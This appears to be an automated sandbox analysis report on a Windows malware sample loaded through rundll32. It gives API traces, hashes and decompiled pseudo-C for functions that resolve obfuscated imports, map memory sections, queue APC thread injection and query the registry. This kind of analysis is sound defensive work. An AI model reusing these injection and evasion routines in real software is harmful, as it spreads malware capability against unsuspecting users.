                                                          • Associated: 00000015.00000002.738826659.0000000000E59000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000015.00000002.738873414.0000000000E5A000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000015.00000002.738891661.0000000000E5C000.00000002.00020000.sdmp Download File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_e50000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: String$AllocFreeQueryUnknown_$Interface_Proxy$Service
                                                          • String ID:
                                                          • API String ID: 2831207796-0
                                                          • Opcode ID: 59bc8f774a2bcc148ca9810179254782311ca470b4509b81737408b847729f1b
                                                          • Instruction ID: 9864ae3dbdd9f9bb173f94e9cc3a30088ce73f34774330c94bca7cc4fb4f485b
                                                          • Opcode Fuzzy Hash: 59bc8f774a2bcc148ca9810179254782311ca470b4509b81737408b847729f1b
                                                          • Instruction Fuzzy Hash: C7315D72900609AFDF01DFA8C845A9FB7B6BF48315F144825ED10FB261DB71AE49CB91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 05593405, Relevance: 9.1, APIs: 6, Instructions: 109memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetLastError.KERNEL32(?,?,?,?,?,05598570,00000018,0557672A,?,?,?), ref: 05593448
                                                          • VirtualProtect.KERNEL32(00000000,00000004,?,?,?,?,?,?,?,?,05598570,00000018,0557672A,?,?,?), ref: 055934D3
                                                          • RtlEnterCriticalSection.NTDLL(0559C300), ref: 055934FB
                                                          • RtlLeaveCriticalSection.NTDLL(0559C300), ref: 05593519
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: CriticalSection$EnterErrorLastLeaveProtectVirtual
                                                          • String ID:
                                                          • API String ID: 3666628472-0
                                                          • Opcode ID: a9d62800ac50624fcacf93320525a00139bb55710a97a98dbf6fc7c32e4aeb04
                                                          • Instruction ID: a078b9fd799c26f75e26a1c2fb6e9822944f8dc38c8c484706e560471c467b3f
                                                          • Opcode Fuzzy Hash: a9d62800ac50624fcacf93320525a00139bb55710a97a98dbf6fc7c32e4aeb04
                                                          • Instruction Fuzzy Hash: 55415B70A00609EFCF15DFA5D8889ADBBF5FF48341B11892AE416E7210D778EA44CF90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 055747C1, Relevance: 9.1, APIs: 6, Instructions: 81libraryloaderCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 05585EA9: RtlAllocateHeap.NTDLL(00000000,?,05586423), ref: 05585EB5
                                                          • GetModuleHandleA.KERNEL32(?,00000020,00000000,0557D41D,?,?,?,?,05573905,?,?,00000000,00000000,75145520), ref: 055747E6
                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 05574808
                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 0557481E
                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 05574834
                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 0557484A
                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 05574860
                                                            • Part of subcall function 0558B878: NtCreateSection.NTDLL(00000000,000F001F,?,?,?,08000000,00000000,75144EE0,00000000,00000000), ref: 0558B8D5
                                                            • Part of subcall function 0558B878: memset.NTDLL ref: 0558B8F9
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: AddressProc$AllocateCreateHandleHeapModuleSectionmemset
                                                          • String ID:
                                                          • API String ID: 3012371009-0
                                                          • Opcode ID: a57f862e9096c2efa106d8d159da6660abca2fd3323865b5e32352d2c61f94a4
                                                          • Instruction ID: d2f94d438d0529ecc707be8e275300814d5f9848c2a8af84220a3041326a4f9d
                                                          • Opcode Fuzzy Hash: a57f862e9096c2efa106d8d159da6660abca2fd3323865b5e32352d2c61f94a4
                                                          • Instruction Fuzzy Hash: 792151B1A1030EEFDB20DFA9DC45E6A7BECFB04244B01456AF505D7201E778E9049F60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00E56ACC, Relevance: 9.1, APIs: 6, Instructions: 81libraryloaderCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E00E56ACC(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
				intOrPtr _v8;
				intOrPtr _t23;
				intOrPtr _t26;
				_Unknown_base(*)()* _t28;
				intOrPtr _t30;
				_Unknown_base(*)()* _t32;
				intOrPtr _t33;
				_Unknown_base(*)()* _t35;
				intOrPtr _t36;
				_Unknown_base(*)()* _t38;
				intOrPtr _t39;
				_Unknown_base(*)()* _t41;
				intOrPtr _t44;
				struct HINSTANCE__* _t48;
				intOrPtr _t54;

				_t54 = E00E55FBC(0x20);
				if(_t54 == 0) {
					_v8 = 8;
				} else {
					_t23 =  *0xe5a2d4; // 0x435d5a8
					_t1 = _t23 + 0xe5b11a; // 0x4c44544e
					_t48 = GetModuleHandleA(_t1);
					_t26 =  *0xe5a2d4; // 0x435d5a8
					_t2 = _t26 + 0xe5b787; // 0x7243775a
					_v8 = 0x7f;
					_t28 = GetProcAddress(_t48, _t2);
					 *(_t54 + 0xc) = _t28;
					if(_t28 == 0) {
						L8:
						E00E513CC(_t54);
					} else {
						_t30 =  *0xe5a2d4; // 0x435d5a8
						_t5 = _t30 + 0xe5b774; // 0x614d775a
						_t32 = GetProcAddress(_t48, _t5);
						 *(_t54 + 0x10) = _t32;
						if(_t32 == 0) {
							goto L8;
						} else {
							_t33 =  *0xe5a2d4; // 0x435d5a8
							_t7 = _t33 + 0xe5b797; // 0x6e55775a
							_t35 = GetProcAddress(_t48, _t7);
							 *(_t54 + 0x14) = _t35;
							if(_t35 == 0) {
								goto L8;
							} else {
								_t36 =  *0xe5a2d4; // 0x435d5a8
								_t9 = _t36 + 0xe5b756; // 0x4e6c7452
								_t38 = GetProcAddress(_t48, _t9);
								 *(_t54 + 0x18) = _t38;
								if(_t38 == 0) {
									goto L8;
								} else {
									_t39 =  *0xe5a2d4; // 0x435d5a8
									_t11 = _t39 + 0xe5b7ac; // 0x6c43775a
									_t41 = GetProcAddress(_t48, _t11);
									 *(_t54 + 0x1c) = _t41;
									if(_t41 == 0) {
										goto L8;
									} else {
										 *((intOrPtr*)(_t54 + 4)) = _a4;
										 *((intOrPtr*)(_t54 + 8)) = 0x40;
										_t44 = E00E56EB3(_t54, _a8); // executed
										_v8 = _t44;
										if(_t44 != 0) {
											goto L8;
										} else {
											 *_a12 = _t54;
										}
									}
								}
							}
						}
					}
				}
				return _v8;
			}


















                                                          0x00e56adb
                                                          0x00e56adf
                                                          0x00e56ba1
                                                          0x00e56ae5
                                                          0x00e56ae5
                                                          0x00e56aea
                                                          0x00e56afd
                                                          0x00e56aff
                                                          0x00e56b04
                                                          0x00e56b0c
                                                          0x00e56b13
                                                          0x00e56b17
                                                          0x00e56b1a
                                                          0x00e56b99
                                                          0x00e56b9a
                                                          0x00e56b1c
                                                          0x00e56b1c
                                                          0x00e56b21
                                                          0x00e56b29
                                                          0x00e56b2d
                                                          0x00e56b30
                                                          0x00000000
                                                          0x00e56b32
                                                          0x00e56b32
                                                          0x00e56b37
                                                          0x00e56b3f
                                                          0x00e56b43
                                                          0x00e56b46
                                                          0x00000000
                                                          0x00e56b48
                                                          0x00e56b48
                                                          0x00e56b4d
                                                          0x00e56b55
                                                          0x00e56b59
                                                          0x00e56b5c
                                                          0x00000000
                                                          0x00e56b5e
                                                          0x00e56b5e
                                                          0x00e56b63
                                                          0x00e56b6b
                                                          0x00e56b6f
                                                          0x00e56b72
                                                          0x00000000
                                                          0x00e56b74
                                                          0x00e56b7a
                                                          0x00e56b7f
                                                          0x00e56b86
                                                          0x00e56b8d
                                                          0x00e56b90
                                                          0x00000000
                                                          0x00e56b92
                                                          0x00e56b95
                                                          0x00e56b95
                                                          0x00e56b90
                                                          0x00e56b72
                                                          0x00e56b5c
                                                          0x00e56b46
                                                          0x00e56b30
                                                          0x00e56b1a
                                                          0x00e56baf

                                                          APIs
                                                            • Part of subcall function 00E55FBC: RtlAllocateHeap.NTDLL(00000000,00000000,00E52035), ref: 00E55FC8
                                                          • GetModuleHandleA.KERNEL32(4C44544E,00000020,00000001,00000000,00000000,?,?,?,00E52F2E,?,?,?,?,00000000,00000000), ref: 00E56AF1
                                                          • GetProcAddress.KERNEL32(00000000,7243775A), ref: 00E56B13
                                                          • GetProcAddress.KERNEL32(00000000,614D775A), ref: 00E56B29
                                                          • GetProcAddress.KERNEL32(00000000,6E55775A), ref: 00E56B3F
                                                          • GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 00E56B55
                                                          • GetProcAddress.KERNEL32(00000000,6C43775A), ref: 00E56B6B
                                                            • Part of subcall function 00E56EB3: NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,75144EE0,00000000,00000000,00E56B8B), ref: 00E56F10
                                                            • Part of subcall function 00E56EB3: memset.NTDLL ref: 00E56F32
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.738756359.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                          • Associated: 00000015.00000002.738720079.0000000000E50000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000015.00000002.738826659.0000000000E59000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000015.00000002.738873414.0000000000E5A000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000015.00000002.738891661.0000000000E5C000.00000002.00020000.sdmp Download File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_e50000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: AddressProc$AllocateCreateHandleHeapModuleSectionmemset
                                                          • String ID:
                                                          • API String ID: 3012371009-0
                                                          • Opcode ID: 958fd570112ec55126b7fdbb0785a825b63e66bf207949ec2785c6ebdea1d140
                                                          • Instruction ID: 6c3192b3f48bd3ecc1587827f2e0e8eac8a63969cb72efb71299088bdbdb35d3
                                                          • Opcode Fuzzy Hash: 958fd570112ec55126b7fdbb0785a825b63e66bf207949ec2785c6ebdea1d140
                                                          • Instruction Fuzzy Hash: 2E2174B1600306DFD790DFAADC45E6A77ECEB48346B045D6AF909E7211D734ED098B60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 05579C77, Relevance: 9.0, APIs: 6, Instructions: 32threadinjectionCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CreateThread.KERNEL32(00000000,00000000,00000000,05572D6E,00000000,0558EB74), ref: 05579C8E
                                                          • QueueUserAPC.KERNEL32(05572D6E,00000000,05571AE4,?,?,05572D6E,05571AE4,00000000,?), ref: 05579CA3
                                                          • GetLastError.KERNEL32(00000000,?,?,05572D6E,05571AE4,00000000,?), ref: 05579CAE
                                                          • TerminateThread.KERNEL32(00000000,00000000,?,?,05572D6E,05571AE4,00000000,?), ref: 05579CB8
                                                          • CloseHandle.KERNEL32(00000000,?,?,05572D6E,05571AE4,00000000,?), ref: 05579CBF
                                                          • SetLastError.KERNEL32(00000000,?,?,05572D6E,05571AE4,00000000,?), ref: 05579CC8
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: ErrorLastThread$CloseCreateHandleQueueTerminateUser
                                                          • String ID:
                                                          • API String ID: 3832013932-0
                                                          • Opcode ID: eb589d563490e566e28f302b2f12384f4c205a6b0f397bbe1cfbff46ddcdbddb
                                                          • Instruction ID: 754c8d8c455ee7552d23f76f584007926b8439232321749201ecb05f7efeceec
                                                          • Opcode Fuzzy Hash: eb589d563490e566e28f302b2f12384f4c205a6b0f397bbe1cfbff46ddcdbddb
                                                          • Instruction Fuzzy Hash: 6AF0A732615220BBDB221F60AC4AF5FBFADFF09741F020406F60690150CF39981CBBA5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00E574CB, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 87sleepCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 41%
                                                          			E00E574CB(void* __ecx, void* __eflags, intOrPtr _a4, signed int* _a8, intOrPtr _a12) {
				intOrPtr _v12;
				void* _v16;
				void* _v28;
				char _v32;
				void* __esi;
				void* _t20;
				void* _t26;
				void* _t29;
				void* _t38;
				signed int* _t39;
				void* _t40;

				_t36 = __ecx;
				_v32 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v12 = _a4;
				_t20 = E00E57770(__ecx,  &_v32); // executed
				_t38 = _t20;
				if(_t38 != 0) {
					L12:
					_t39 = _a8;
					L13:
					if(_t39 != 0 && ( *_t39 & 0x00000001) == 0) {
						_t23 =  &(_t39[1]);
						if(_t39[1] != 0) {
							E00E53625(_t23);
						}
					}
					return _t38;
				}
				_t26 = E00E5249F(0x40,  &_v16); // executed
				if(_t26 != 0) {
					_v16 = 0;
				}
				_t40 = CreateEventA(0xe5a2f8, 1, 0,  *0xe5a394);
				if(_t40 != 0) {
					SetEvent(_t40);
					Sleep(0xbb8); // executed
					CloseHandle(_t40);
				}
				_push( &_v32);
				if(_a12 == 0) {
					_t29 = E00E53D85(_t36); // executed
				} else {
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_t29 = E00E55448(_t36);
				}
				_t41 = _v16;
				_t38 = _t29;
				if(_v16 != 0) {
					E00E5243E(_t41);
				}
				if(_t38 != 0) {
					goto L12;
				} else {
					_t39 = _a8;
					_t38 = E00E54BAC( &_v32, _t39);
					goto L13;
				}
			}














                                                          0x00e574cb
                                                          0x00e574d8
                                                          0x00e574de
                                                          0x00e574df
                                                          0x00e574e0
                                                          0x00e574e1
                                                          0x00e574e2
                                                          0x00e574e6
                                                          0x00e574ed
                                                          0x00e574f2
                                                          0x00e574f6
                                                          0x00e5757e
                                                          0x00e5757e
                                                          0x00e57581
                                                          0x00e57583
                                                          0x00e5758b
                                                          0x00e57591
                                                          0x00e57594
                                                          0x00e57594
                                                          0x00e57591
                                                          0x00e5759f
                                                          0x00e5759f
                                                          0x00e57502
                                                          0x00e57509
                                                          0x00e5750b
                                                          0x00e5750b
                                                          0x00e57522
                                                          0x00e57526
                                                          0x00e57529
                                                          0x00e57534
                                                          0x00e5753b
                                                          0x00e5753b
                                                          0x00e57547
                                                          0x00e57548
                                                          0x00e57556
                                                          0x00e5754a
                                                          0x00e5754a
                                                          0x00e5754b
                                                          0x00e5754c
                                                          0x00e5754d
                                                          0x00e5754e
                                                          0x00e5754f
                                                          0x00e5754f
                                                          0x00e5755b
                                                          0x00e57560
                                                          0x00e57562
                                                          0x00e57564
                                                          0x00e57564
                                                          0x00e5756b
                                                          0x00000000
                                                          0x00e5756d
                                                          0x00e5756d
                                                          0x00e5757a
                                                          0x00000000
                                                          0x00e5757a

                                                          APIs
                                                          • CreateEventA.KERNEL32(00E5A2F8,00000001,00000000,00000040,?,?,7519F710,00000000,7519F730,?,?,?,yE,00E5519C,?,?), ref: 00E5751C
                                                          • SetEvent.KERNEL32(00000000,?,?,?,yE,00E5519C,?,?,yE,00000002,?,?,yE), ref: 00E57529
                                                          • Sleep.KERNEL32(00000BB8,?,?,?,yE,00E5519C,?,?,yE,00000002,?,?,yE), ref: 00E57534
                                                          • CloseHandle.KERNEL32(00000000,?,?,?,yE,00E5519C,?,?,yE,00000002,?,?,yE), ref: 00E5753B
                                                            • Part of subcall function 00E53D85: RegOpenKeyExA.KERNEL32(80000003,00000000,00000000,00020019,?,00000000,00000000,?,?,?,?,?,00E5755B,?), ref: 00E53DAB
                                                            • Part of subcall function 00E53D85: RegEnumKeyExA.KERNEL32(?,?,?,00E5755B,00000000,00000000,00000000,00000000,00000104,00000000,?,?,?,?,?,00E5755B), ref: 00E53DF2
                                                            • Part of subcall function 00E53D85: WaitForSingleObject.KERNEL32(00000000,?,?,?,00E5755B,?,00E5755B,?,?,?,?,?,00E5755B,?), ref: 00E53E5F
                                                            • Part of subcall function 00E53D85: RegCloseKey.ADVAPI32(?,00000104,00000000,?,?,?,?,?,00E5755B,?,?,?,?,yE,00E5519C,?), ref: 00E53E87
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.738756359.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                          • Associated: 00000015.00000002.738720079.0000000000E50000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000015.00000002.738826659.0000000000E59000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000015.00000002.738873414.0000000000E5A000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000015.00000002.738891661.0000000000E5C000.00000002.00020000.sdmp Download File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_e50000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: CloseEvent$CreateEnumHandleObjectOpenSingleSleepWait
                                                          • String ID: yE
                                                          • API String ID: 891522397-3927521143
                                                          • Opcode ID: 52a15a9b914f7e270208aa45db2ff4daca10464b2be032579c0ee01a31959e25
                                                          • Instruction ID: 765a833b2cdbf08727d29e6371bedf833797b87e334677c0c519f277ce6afce0
                                                          • Opcode Fuzzy Hash: 52a15a9b914f7e270208aa45db2ff4daca10464b2be032579c0ee01a31959e25
                                                          • Instruction Fuzzy Hash: D621C572D04215ABCB20AFE5A8858EE73B9AB44356F055C29FE51B7140E730DD4CC7A0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 055750C7, Relevance: 7.6, APIs: 5, Instructions: 67registrymemoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 055783D0: RegCreateKeyA.ADVAPI32(80000001,059BA7F0,059BB184), ref: 055783E5
                                                            • Part of subcall function 055783D0: lstrlen.KERNEL32(059BA7F0,00000000,00000000,0559B072,?,?,?,05581876,00000001,00000000,059BB184), ref: 0557840E
                                                          • RegQueryValueExA.KERNEL32(00000000,055729E6,00000000,055729E6,00000000,?,?,00000000,00000000,?,?,055729E6,055729E6,?,05588593,?), ref: 055750FF
                                                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 05575113
                                                          • RegQueryValueExA.ADVAPI32(00000000,055729E6,00000000,055729E6,00000000,?,?,00000000,00000000,?,?,055729E6,055729E6,?,05588593,?), ref: 0557512D
                                                          • HeapFree.KERNEL32(00000000,?,?,00000000,00000000,?,?,055729E6,055729E6,?,05588593,?,055729E6,00000000), ref: 05575149
                                                          • RegCloseKey.ADVAPI32(00000000,?,00000000,00000000,?,?,055729E6,055729E6,?,05588593,?,055729E6,00000000), ref: 05575157
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: HeapQueryValue$AllocateCloseCreateFreelstrlen
                                                          • String ID:
                                                          • API String ID: 1633053242-0
                                                          • Opcode ID: 0eb2fc661bdf2b5f4b46bd62f6d9c96dbe1994e6dda2922e671e7200a8f0aa48
                                                          • Instruction ID: cfd1faf5ac7d2b3d8849fb0854633bb3fe95c2cd5f15a09f735e205ed70d831a
                                                          • Opcode Fuzzy Hash: 0eb2fc661bdf2b5f4b46bd62f6d9c96dbe1994e6dda2922e671e7200a8f0aa48
                                                          • Instruction Fuzzy Hash: 5D1179B251010DFFDF019F95EC85CAE7F7EFB88264B120426F60197210EA719D58AB60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0557623F, Relevance: 7.5, APIs: 5, Instructions: 46memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • VirtualProtect.KERNEL32(?,?,00000040,?), ref: 05576264
                                                          • GetLastError.KERNEL32 ref: 0557626C
                                                          • VirtualQuery.KERNEL32(?,?,0000001C), ref: 05576283
                                                          • VirtualProtect.KERNEL32(?,?,-2C9B417C,?), ref: 055762A8
                                                          • SetLastError.KERNEL32(?), ref: 055762B1
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: Virtual$ErrorLastProtect$Query
                                                          • String ID:
                                                          • API String ID: 148356745-0
                                                          • Opcode ID: 38dacca31639ecaa9d30f6db50da428f288eef6cfc8ca20aa2da674771faadb8
                                                          • Instruction ID: a0c201ad7fb78448b17d9f8d6533eb8bc9ea988df206aed3d212213204efa027
                                                          • Opcode Fuzzy Hash: 38dacca31639ecaa9d30f6db50da428f288eef6cfc8ca20aa2da674771faadb8
                                                          • Instruction Fuzzy Hash: CB01E57650020DFF9F11AF95DC45CAABBB9FB08251B014026F946D3120EBB1DA29ABA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00E55242, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 82memoryCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 94%
                                                          			E00E55242(intOrPtr* __eax, void* __ecx, void* __edx, long _a4, void** _a8, intOrPtr* _a12, char _a16) {
				char _v8;
				char _v48;
				void* __edi;
				intOrPtr _t22;
				long _t29;
				intOrPtr _t33;
				intOrPtr* _t41;
				void* _t42;
				void* _t46;
				intOrPtr* _t47;
				void* _t48;
				intOrPtr _t50;

				_t46 = __edx;
				_t42 = __ecx;
				_t41 = _a16;
				_t47 = __eax;
				_t22 =  *0xe5a2d4; // 0x435d5a8
				_t2 = _t22 + 0xe5b671; // 0x657a6973
				wsprintfA( &_v48, _t2,  *__eax,  *_t41);
				if( *0xe5a2a4 >= 5) {
					_push( &_a16);
					_t10 =  &_v8; // 0xe5517b
					_push( &_v48);
					_t29 = _a4;
					"QQSUVWh"();
					L5:
					_a4 = _t29;
					L6:
					if(_a4 != 0) {
						L9:
						 *0xe5a2a4 =  *0xe5a2a4 + 1;
						L10:
						return _a4;
					}
					_t49 = _a16;
					 *_t47 = _a16;
					_t16 =  &_v8; // 0xe5517b
					_t48 =  *_t16;
					 *_t41 = E00E556BF(_t49, _t48); // executed
					_t33 = E00E56997(_t48, _t49); // executed
					if(_t33 != 0) {
						 *_a8 = _t48;
						 *_a12 = _t33;
						if( *0xe5a2a4 < 5) {
							 *0xe5a2a4 =  *0xe5a2a4 & 0x00000000;
						}
						goto L10;
					}
					_a4 = 0xbf;
					E00E53546();
					HeapFree( *0xe5a290, 0, _t48);
					goto L9;
				}
				_t50 =  *0xe5a390; // 0x51b8d6c
				if(RtlAllocateHeap( *0xe5a290, 0, 0x800) == 0) {
					_a4 = 8;
					goto L6;
				}
				_t5 =  &_v8; // 0xe5517b
				_t29 = E00E5254C(_a4, _t42, _t46, _t50,  &_v48, _t5,  &_a16, _t36);
				goto L5;
			}















                                                          0x00e55242
                                                          0x00e55242
                                                          0x00e55249
                                                          0x00e55250
                                                          0x00e55254
                                                          0x00e55259
                                                          0x00e55264
                                                          0x00e55274
                                                          0x00e552b7
                                                          0x00e552b8
                                                          0x00e552bf
                                                          0x00e552c0
                                                          0x00e552c3
                                                          0x00e552c8
                                                          0x00e552c8
                                                          0x00e552cb
                                                          0x00e552cf
                                                          0x00e55309
                                                          0x00e55309
                                                          0x00e5530f
                                                          0x00e55316
                                                          0x00e55316
                                                          0x00e552d1
                                                          0x00e552d4
                                                          0x00e552d6
                                                          0x00e552d6
                                                          0x00e552e3
                                                          0x00e552e5
                                                          0x00e552ec
                                                          0x00e55323
                                                          0x00e55328
                                                          0x00e5532a
                                                          0x00e5532c
                                                          0x00e5532c
                                                          0x00000000
                                                          0x00e5532a
                                                          0x00e552ee
                                                          0x00e552f5
                                                          0x00e55303
                                                          0x00000000
                                                          0x00e55303
                                                          0x00e55276
                                                          0x00e55291
                                                          0x00e552ab
                                                          0x00000000
                                                          0x00e552ab
                                                          0x00e55298
                                                          0x00e552a4
                                                          0x00000000

                                                          APIs
                                                          • wsprintfA.USER32 ref: 00E55264
                                                          • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 00E55289
                                                            • Part of subcall function 00E5254C: GetTickCount.KERNEL32 ref: 00E52563
                                                            • Part of subcall function 00E5254C: wsprintfA.USER32 ref: 00E525B0
                                                            • Part of subcall function 00E5254C: wsprintfA.USER32 ref: 00E525CD
                                                            • Part of subcall function 00E5254C: wsprintfA.USER32 ref: 00E525ED
                                                            • Part of subcall function 00E5254C: wsprintfA.USER32 ref: 00E5260B
                                                            • Part of subcall function 00E5254C: wsprintfA.USER32 ref: 00E5262E
                                                            • Part of subcall function 00E5254C: wsprintfA.USER32 ref: 00E5264F
                                                          • HeapFree.KERNEL32(00000000,{Q,?,?,{Q,?), ref: 00E55303
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.738756359.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                          • Associated: 00000015.00000002.738720079.0000000000E50000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000015.00000002.738826659.0000000000E59000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000015.00000002.738873414.0000000000E5A000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000015.00000002.738891661.0000000000E5C000.00000002.00020000.sdmp Download File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_e50000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: wsprintf$Heap$AllocateCountFreeTick
                                                          • String ID: {Q
                                                          • API String ID: 2794511967-1336059103
                                                          • Opcode ID: 9092bf540566d072ae3b5388a799c203d7245e53e39d04977bce390007414eef
                                                          • Instruction ID: ac0f40a5d0b0fbfe93e0aa7f4871a5f4c2d15250f334f43a88151f04ed23c863
                                                          • Opcode Fuzzy Hash: 9092bf540566d072ae3b5388a799c203d7245e53e39d04977bce390007414eef
                                                          • Instruction Fuzzy Hash: 80317F76500209EFCB05DF65DC45ADA37BCFB48346F144922FA05FB261D7709A08CBA2
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00E513E1, Relevance: 6.1, APIs: 4, Instructions: 120synchronizationCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 62%
                                                          			E00E513E1(void* __eax) {
				long _v8;
				char _v12;
				char _v16;
				intOrPtr _v20;
				void* _v24;
				void* __esi;
				void* _t41;
				char* _t42;
				long _t43;
				void* _t46;
				intOrPtr _t47;
				intOrPtr* _t48;
				char _t50;
				long _t54;
				char* _t55;
				long _t56;
				intOrPtr* _t57;
				void* _t60;
				void* _t61;
				void* _t68;
				void* _t72;
				void* _t73;
				void* _t74;
				void* _t78;

				_t72 = __eax;
				if( *((intOrPtr*)(__eax + 0xc)) != 0) {
					L2:
					_t41 = _t72;
					_pop(_t73);
					_t74 = _t41;
					_t42 =  &_v12;
					_v8 = 0;
					_v16 = 0;
					__imp__( *((intOrPtr*)(_t74 + 0x18)), _t42, _t68, _t73, _t61, _t78);
					if(_t42 == 0) {
						_t43 = GetLastError();
						_v8 = _t43;
						if(_t43 == 0x2efe) {
							_v8 = 0;
							goto L29;
						}
					} else {
						if(_v12 == 0) {
							L29:
							 *((intOrPtr*)(_t74 + 0x30)) = 0;
						} else {
							_t46 =  *0xe5a144(0, 1,  &_v24); // executed
							if(_t46 != 0) {
								_v8 = 8;
							} else {
								_t47 = E00E55FBC(0x1000);
								_v20 = _t47;
								if(_t47 == 0) {
									_v8 = 8;
								} else {
									goto L8;
									do {
										while(1) {
											L8:
											_t50 = _v12;
											if(_t50 >= 0x1000) {
												_t50 = 0x1000;
											}
											__imp__( *((intOrPtr*)(_t74 + 0x18)), _v20, _t50,  &_v16);
											if(_t50 == 0) {
												break;
											}
											_t57 = _v24;
											 *((intOrPtr*)( *_t57 + 0x10))(_t57, _v20, _v16, 0);
											_t18 =  &_v12;
											 *_t18 = _v12 - _v16;
											if( *_t18 != 0) {
												continue;
											} else {
											}
											L14:
											if(WaitForSingleObject( *0xe5a2c4, 0) != 0x102) {
												_v8 = 0x102;
											} else {
												_t55 =  &_v12;
												__imp__( *((intOrPtr*)(_t74 + 0x18)), _t55); // executed
												if(_t55 != 0) {
													goto L19;
												} else {
													_t56 = GetLastError();
													_v8 = _t56;
													if(_t56 == 0x2f78 && _v12 == 0) {
														_v8 = 0;
														goto L19;
													}
												}
											}
											L22:
											E00E513CC(_v20);
											if(_v8 == 0) {
												_t54 = E00E51675(_v24, _t74); // executed
												_v8 = _t54;
											}
											goto L25;
										}
										_v8 = GetLastError();
										goto L14;
										L19:
									} while (_v12 != 0);
									goto L22;
								}
								L25:
								_t48 = _v24;
								 *((intOrPtr*)( *_t48 + 8))(_t48);
							}
						}
					}
					return _v8;
				} else {
					_t60 = E00E5142C(__eax); // executed
					if(_t60 != 0) {
						return _t60;
					} else {
						goto L2;
					}
				}
			}



























                                                          0x00e513e2
                                                          0x00e513e8
                                                          0x00e513f3
                                                          0x00e513f3
                                                          0x00e513f5
                                                          0x00e51eab
                                                          0x00e51eae
                                                          0x00e51eb7
                                                          0x00e51eba
                                                          0x00e51ebd
                                                          0x00e51ec5
                                                          0x00e51fc3
